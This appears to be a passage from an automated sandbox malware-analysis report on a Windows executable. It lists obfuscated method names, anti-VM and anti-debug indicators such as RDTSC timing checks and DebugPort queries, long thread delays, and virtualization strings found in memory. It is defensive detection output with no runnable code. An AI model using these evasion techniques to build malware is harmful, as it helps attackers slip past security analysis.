                Source: 3.2.xU0wdBC6XWRZ6UY.exe.4722990.1.raw.unpack, YdFeQq9tHdqAswqADM.csHigh entropy of concatenated method names: 'KU4l7k5Jn4', 'reSlmGl57V', 'HvElkaDWYL', 'ByklwYu0Ls', 'cRrlSdS79P', 'x3RlxuLoSV', 'PBplYSFQTs', 'EDSl9VRDvS', 'nbQlGkOttE', 'IuRle3qD3T'
                Source: 3.2.xU0wdBC6XWRZ6UY.exe.4722990.1.raw.unpack, E1M3iiERCnPP7Bm8X1.csHigh entropy of concatenated method names: 'iDeofTTCZ5', 'KhboUg2y5O', 'JGroqynYs2', 'AwpoS4H2DL', 'qfloYQrbxp', 'C41o9Fb59s', 'WhpoeP3CQr', 'roboNke413', 'ud7o71kso6', 'o3tog9SFiU'
                Source: 3.2.xU0wdBC6XWRZ6UY.exe.4722990.1.raw.unpack, KIEU43UyhBb4c8dFta.csHigh entropy of concatenated method names: 'UQEF5Gk1a', 'yHsA4M12V', 'B8o6kSO7e', 'd3hyNAyMo', 'nc6Usf2Yo', 'BXMVVYyMW', 'QN6ANmmX2bF5BcAUxS', 'V29V1OZAOaf22RE6Ts', 'AHWji6m7L', 'MgqcYDiZG'
                Source: 3.2.xU0wdBC6XWRZ6UY.exe.4722990.1.raw.unpack, rFjhCiAGQph79Ypq2eY.csHigh entropy of concatenated method names: 'qdQKRqGXE7', 'MB0KTnTyy3', 'ArOKFxhc1l', 'GZ6KALK3Y1', 'NtWKiaQij0', 'M9nK6EVSGa', 'QJXKyv8TY7', 'oOeKf1v82W', 'peDKUP4ejg', 'o9QKV2ucO9'
                Source: 3.2.xU0wdBC6XWRZ6UY.exe.4722990.1.raw.unpack, KZZXqcc8tiXrQFatx7.csHigh entropy of concatenated method names: 'i2ZJQHnghv', 'QM7JXQEZvr', 'NMjJr0dWsk', 'PVRJHjgxmq', 'MmGJtF8PGT', 'ycSJ0FXmqy', 'Uc7JEoEf0E', 'u7fJddJYHJ', 'scRJOFxWC7', 'yMiJDVtOi4'
                Source: 3.2.xU0wdBC6XWRZ6UY.exe.4722990.1.raw.unpack, O5vIvyKmoj5ogVasPv.csHigh entropy of concatenated method names: 'FEkPWRB8vk', 'A6vPCil5Tl', 'NhOjvRYHhy', 'PGmjuHERtM', 'cxRPgVgXnH', 'rk2PmpTq54', 'iQdP5oHXLc', 'sKdPk4AtQY', 'NfePwbXWlT', 'myAP19FPDp'
                Source: 3.2.xU0wdBC6XWRZ6UY.exe.34110fc.0.raw.unpack, lNjw1JhxSV5n0cCMNW.csHigh entropy of concatenated method names: 'Kb0HWSL22O', 'RgtTUJcyZL', 'jHu2HrxObq', 'UAF22bihQq', 'Hla2xZGvyo', 'XAB2tPq0q8', 'aeMUEk3AsB3Pt', 'xw8jvYcwb', 'eSADOWkF2', 'hfhQtMtDc'
                Source: 3.2.xU0wdBC6XWRZ6UY.exe.34110fc.0.raw.unpack, NkEtj4xdihRGcDPjVY.csHigh entropy of concatenated method names: 'HVYMFtP2f', 'CuEekxjKf', 'WGqJ3oTFt', 'GCn1bRmSG', 'Kbtl1TeP0', 'Fy7hiDf8S', 'e5JqCGSck', 'C2SLkryPZ', 'ksT8NQvKO', 'zvqT1Z212'
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\cmmon32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Yara detected AntiVM3
                Source: Yara matchFile source: Process Memory Space: xU0wdBC6XWRZ6UY.exe PID: 1540, type: MEMORYSTR
                Switches to a custom stack to bypass stack traces
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeAPI/Special instruction interceptor: Address: 7FFB2CECD324
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeAPI/Special instruction interceptor: Address: 7FFB2CED0774
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeAPI/Special instruction interceptor: Address: 7FFB2CED0154
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeAPI/Special instruction interceptor: Address: 7FFB2CECD8A4
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeAPI/Special instruction interceptor: Address: 7FFB2CECDA44
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeAPI/Special instruction interceptor: Address: 7FFB2CECD1E4
                Source: C:\Windows\SysWOW64\cmmon32.exeAPI/Special instruction interceptor: Address: 7FFB2CECD324
                Source: C:\Windows\SysWOW64\cmmon32.exeAPI/Special instruction interceptor: Address: 7FFB2CED0774
                Source: C:\Windows\SysWOW64\cmmon32.exeAPI/Special instruction interceptor: Address: 7FFB2CECD944
                Source: C:\Windows\SysWOW64\cmmon32.exeAPI/Special instruction interceptor: Address: 7FFB2CECD504
                Source: C:\Windows\SysWOW64\cmmon32.exeAPI/Special instruction interceptor: Address: 7FFB2CECD544
                Source: C:\Windows\SysWOW64\cmmon32.exeAPI/Special instruction interceptor: Address: 7FFB2CECD1E4
                Source: C:\Windows\SysWOW64\cmmon32.exeAPI/Special instruction interceptor: Address: 7FFB2CED0154
                Source: C:\Windows\SysWOW64\cmmon32.exeAPI/Special instruction interceptor: Address: 7FFB2CECD8A4
                Source: C:\Windows\SysWOW64\cmmon32.exeAPI/Special instruction interceptor: Address: 7FFB2CECDA44
                Tries to detect virtualization through RDTSC time measurements
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeRDTSC instruction interceptor: First address: 409904 second address: 40990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeRDTSC instruction interceptor: First address: 409B6E second address: 409B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
                Source: C:\Windows\SysWOW64\cmmon32.exeRDTSC instruction interceptor: First address: 2C99904 second address: 2C9990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
                Source: C:\Windows\SysWOW64\cmmon32.exeRDTSC instruction interceptor: First address: 2C99B6E second address: 2C99B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeMemory allocated: 18F0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeMemory allocated: 33E0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeMemory allocated: 31C0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeMemory allocated: 94E0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeMemory allocated: A4E0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeMemory allocated: A7E0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeMemory allocated: B7E0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_00409AA0 rdtsc 11_2_00409AA0
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeThread delayed: delay time: 240000Jump to behavior
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeThread delayed: delay time: 239890Jump to behavior
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeThread delayed: delay time: 239781Jump to behavior
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeThread delayed: delay time: 239672Jump to behavior
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeThread delayed: delay time: 239562Jump to behavior
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeThread delayed: delay time: 239453Jump to behavior
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeThread delayed: delay time: 239330Jump to behavior
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeThread delayed: delay time: 239218Jump to behavior
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeThread delayed: delay time: 239105Jump to behavior
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeThread delayed: delay time: 239000Jump to behavior
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeThread delayed: delay time: 238890Jump to behavior
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeThread delayed: delay time: 238781Jump to behavior
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeThread delayed: delay time: 238671Jump to behavior
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeThread delayed: delay time: 238562Jump to behavior
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeThread delayed: delay time: 238430Jump to behavior
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeThread delayed: delay time: 238328Jump to behavior
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeThread delayed: delay time: 238217Jump to behavior
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeThread delayed: delay time: 238104Jump to behavior
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeThread delayed: delay time: 237984Jump to behavior
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeThread delayed: delay time: 237873Jump to behavior
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeThread delayed: delay time: 237763Jump to behavior
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeWindow / User API: threadDelayed 656Jump to behavior
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeWindow / User API: threadDelayed 3315Jump to behavior
                Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 5092Jump to behavior
                Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 4849Jump to behavior
                Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 886Jump to behavior
                Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 865Jump to behavior
                Source: C:\Windows\SysWOW64\cmmon32.exeWindow / User API: threadDelayed 9729Jump to behavior
                Source: C:\Windows\explorer.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_12-13911
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeAPI coverage: 1.6 %
                Source: C:\Windows\SysWOW64\cmmon32.exeAPI coverage: 1.8 %
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe TID: 4852Thread sleep time: -14757395258967632s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe TID: 4852Thread sleep time: -240000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe TID: 4852Thread sleep time: -239890s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe TID: 4852Thread sleep time: -239781s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe TID: 4852Thread sleep time: -239672s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe TID: 4852Thread sleep time: -239562s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe TID: 4852Thread sleep time: -239453s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe TID: 4852Thread sleep time: -239330s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe TID: 4852Thread sleep time: -239218s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe TID: 4852Thread sleep time: -239105s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe TID: 4852Thread sleep time: -239000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe TID: 4852Thread sleep time: -238890s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe TID: 4852Thread sleep time: -238781s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe TID: 4852Thread sleep time: -238671s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe TID: 4852Thread sleep time: -238562s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe TID: 4852Thread sleep time: -238430s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe TID: 4852Thread sleep time: -238328s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe TID: 4852Thread sleep time: -238217s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe TID: 4852Thread sleep time: -238104s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe TID: 4852Thread sleep time: -237984s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe TID: 4852Thread sleep time: -237873s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe TID: 4852Thread sleep time: -237763s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe TID: 6808Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\explorer.exe TID: 1624Thread sleep time: -10184000s >= -30000sJump to behavior
                Source: C:\Windows\explorer.exe TID: 1624Thread sleep time: -9698000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\cmmon32.exe TID: 4872Thread sleep count: 242 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\cmmon32.exe TID: 4872Thread sleep time: -484000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\cmmon32.exe TID: 4872Thread sleep count: 9729 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\cmmon32.exe TID: 4872Thread sleep time: -19458000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\cmmon32.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\cmmon32.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeThread delayed: delay time: 240000Jump to behavior
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeThread delayed: delay time: 239890Jump to behavior
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeThread delayed: delay time: 239781Jump to behavior
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeThread delayed: delay time: 239672Jump to behavior
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeThread delayed: delay time: 239562Jump to behavior
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeThread delayed: delay time: 239453Jump to behavior
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeThread delayed: delay time: 239330Jump to behavior
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeThread delayed: delay time: 239218Jump to behavior
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeThread delayed: delay time: 239105Jump to behavior
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeThread delayed: delay time: 239000Jump to behavior
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeThread delayed: delay time: 238890Jump to behavior
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeThread delayed: delay time: 238781Jump to behavior
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeThread delayed: delay time: 238671Jump to behavior
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeThread delayed: delay time: 238562Jump to behavior
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeThread delayed: delay time: 238430Jump to behavior
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeThread delayed: delay time: 238328Jump to behavior
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeThread delayed: delay time: 238217Jump to behavior
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeThread delayed: delay time: 238104Jump to behavior
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeThread delayed: delay time: 237984Jump to behavior
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeThread delayed: delay time: 237873Jump to behavior
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeThread delayed: delay time: 237763Jump to behavior
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: explorer.exe, 0000000C.00000000.1300394418.0000000000C74000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000I
                Source: explorer.exe, 0000000C.00000000.1306325777.0000000003249000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware, Inc.
                Source: explorer.exe, 0000000C.00000000.1312007503.0000000008DFE000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: BBSCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
                Source: explorer.exe, 0000000C.00000000.1312007503.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3741055942.0000000008F4D000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: explorer.exe, 0000000C.00000000.1306325777.0000000003249000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware, Inc.NoneVMware-42 27 88 19 56 cc 59 1a-97 79 fb 8c bf a1 e2 9dVMware20,1
                Source: explorer.exe, 0000000C.00000003.3074700657.0000000009013000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
                Source: explorer.exe, 0000000C.00000000.1306325777.0000000003249000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware, Inc.VMW201.00V.20829224.B64.221121184211/21/2022
                Source: explorer.exe, 0000000C.00000000.1306325777.0000000003249000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SVGA II
                Source: explorer.exe, 0000000C.00000000.1308477475.0000000007306000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: War&Prod_VMware_xU1
                Source: explorer.exe, 0000000C.00000000.1312007503.0000000008DFE000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}e
                Source: explorer.exe, 0000000C.00000002.3741055942.0000000008F4D000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000I}~"
                Source: explorer.exe, 0000000C.00000003.3076196212.0000000009052000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000}io
                Source: explorer.exe, 0000000C.00000002.3741055942.0000000008F4D000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
                Source: explorer.exe, 0000000C.00000002.3741055942.0000000008DFE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.1312007503.0000000008DFE000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWystem32\DriverStore\en-US\machine.inf_loc5
                Source: explorer.exe, 0000000C.00000000.1306325777.0000000003249000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware20,1
                Source: explorer.exe, 0000000C.00000000.1306325777.0000000003249000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware Virtual RAM00000001VMW-4096MBRAM slot #0RAM slot #0
                Source: explorer.exe, 0000000C.00000000.1312007503.0000000008DFE000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMWare
                Source: explorer.exe, 0000000C.00000003.3076196212.0000000009052000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000'
                Source: explorer.exe, 0000000C.00000000.1308477475.0000000007306000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: War&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                Source: explorer.exe, 0000000C.00000002.3741055942.0000000008F27000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.1312007503.0000000008F27000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWT`
                Source: explorer.exe, 0000000C.00000000.1306325777.0000000003249000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SVGA IIES1371
                Source: explorer.exe, 0000000C.00000000.1306325777.0000000003249000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware Virtual RAM
                Source: explorer.exe, 0000000C.00000000.1306325777.0000000003249000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware-42 27 88 19 56 cc 59 1a-97 79 fb 8c bf a1 e2 9d
                Source: explorer.exe, 0000000C.00000000.1300394418.0000000000C74000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
                Source: explorer.exe, 0000000C.00000000.1312007503.0000000008DFE000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
                Source: explorer.exe, 0000000C.00000000.1300394418.0000000000C74000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeProcess queried: DebugPortJump to behavior
